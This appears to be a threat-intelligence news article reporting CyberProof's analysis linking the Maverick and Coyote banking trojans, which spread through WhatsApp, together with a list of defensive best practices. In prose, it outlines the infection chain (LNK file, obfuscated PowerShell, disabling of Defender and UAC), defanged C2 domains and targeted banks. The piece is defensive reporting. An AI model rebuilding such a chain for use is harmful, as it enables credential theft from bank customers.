Brazil’s financial sector has long been a hotbed for banking trojans – malware designed to steal user credentials and hijack transactions – but a new discovery suggests these threats are evolving, merging, and getting smarter.
According to CyberProof’s recent analysis, researchers identified strong connections between two notorious trojans: Maverick and Coyote. Both target Brazilian users via malicious files shared over WhatsApp, use complex PowerShell obfuscation, and share nearly identical routines for monitoring banking applications and decrypting sensitive URLs.
The investigation began when CyberProof’s Security Operations Center (SOC) detected a suspicious file download from WhatsApp Web, a common infection vector for personal and business devices. What initially appeared as an isolated incident soon revealed a deeper web of interconnected campaigns linked to ongoing Brazilian banking malware operations.
The Anatomy of the Attack
The infection chain follows a multi-stage approach:
- The user downloads a seemingly harmless ZIP file via web.whatsapp.com.
- Inside, a disguised
.lnk(shortcut) file executes obfuscated PowerShell commands. - The script connects to the attacker’s command-and-control (C2) server (
zapgrande[.]com) to fetch the next-stage payload. - Once active, the malware disables Microsoft Defender and User Account Control (UAC), then downloads encrypted modules that steal data or hijack browser sessions.
Researchers discovered that both Maverick and Coyote use identical AES + GZIP encryption methods to decrypt targeted Brazilian banking URLs, a key clue linking the two strains. They also share code structures that check for processes tied to major banks, crypto exchanges, and even WhatsApp Web, indicating broader surveillance and credential-stealing capabilities.
Notably, Maverick’s persistence is achieved through a batch file that auto-runs at startup, coded to communicate with a second C2 domain (sorvetenopote[.]com).
A Targeted Threat to Brazilian Financial Institutions
The malware’s victimology confirms it’s laser-focused on Brazilian financial platforms, including:
- banco.bradesco, caixa.gov.br, itau.com.br, santandernetibe.com.br, banrisul.com.br, bb.com.br, and mercadobitcoin.com.br.
- Popular crypto trading sites such as Binance and Blockchain.com are also in the crosshairs.
Maverick first verifies whether the victim is located in Brazil before activating. If not, it self-terminates, a tactic used to avoid global detection and sandbox analysis. Once active, it communicates with attacker servers to receive commands, exfiltrate credentials, and potentially perform fileless execution using PowerShell in memory, making detection extremely challenging.
CyberProof’s analysis highlights that Maverick and Coyote may share not just techniques, but also developers or operational control, suggesting an evolution from isolated malware projects into coordinated cybercrime ecosystems.
Why It Matters Globally, and in the MEA Region
While the current wave targets Brazil, this kind of modular banking malware has a history of crossing borders. Once attackers validate techniques locally, they often retool them for other markets, including the Middle East and Africa, where mobile banking adoption is rising rapidly.
With many GCC and African banks expanding digital services, similar attacks could emerge, leveraging messaging apps like WhatsApp or Telegram as infection vectors. As these apps blur personal and business communications, the risk extends from individual users to enterprise endpoints.
10 Best Practices for Defenders
To mitigate risks from trojans like Maverick and Coyote, security teams should:
- Educate employees about malicious attachments and links — especially from messaging platforms. (Cybersecurity training)
- Restrict file downloads from personal communication channels on corporate networks.
- Monitor PowerShell activity for obfuscated or encoded commands.
- Enforce endpoint protection policies that block unsigned scripts and suspicious processes.
- Deploy behavioral detection tools that flag abnormal use of
cmd.exeandpowershell.exe. - Segment networks to isolate infected endpoints quickly.
- Apply strict access controls for data transfers and USB devices.
- Leverage threat intelligence feeds (such as Saintynet Cybersecurity) to track emerging banking malware IOCs.
- Regularly patch systems and browsers to eliminate vulnerabilities exploited by loaders.
- Conduct simulated phishing and infection response drills to strengthen SOC readiness.
The Bigger Picture
Maverick and Coyote are part of a larger pattern, banking trojans becoming more modular, stealthy, and collaborative. As AI-driven automation enters the attacker’s toolkit, analysts predict more sophisticated versions could surface, blending information-stealing, ransomware, and even social engineering functions.
According to CyberProof, the overlap between these two malware families underscores the growing industrialization of cybercrime, where shared codebases and tools are traded across underground ecosystems.
For security professionals in Brazil and beyond, the message is clear: malware doesn’t stay local for long. Strengthening defenses now – from endpoint visibility to user awareness -is key to staying ahead of evolving threats.
Conclusion
The link between Maverick and Coyote represents more than just shared code, it’s a sign that financial malware operations are maturing, combining stealth, social engineering, and technical innovation.
Organizations worldwide, particularly across emerging digital economies like the Middle East and Africa, must recognize this evolution and respond with equally adaptive security strategies.
Stay informed, stay resilient, and invest in continuous cybersecurity training, because the next variant could already be in development.
Source: CyberProof – “Analyzing the Link Between Two Evolving Brazilian Banking Trojans”
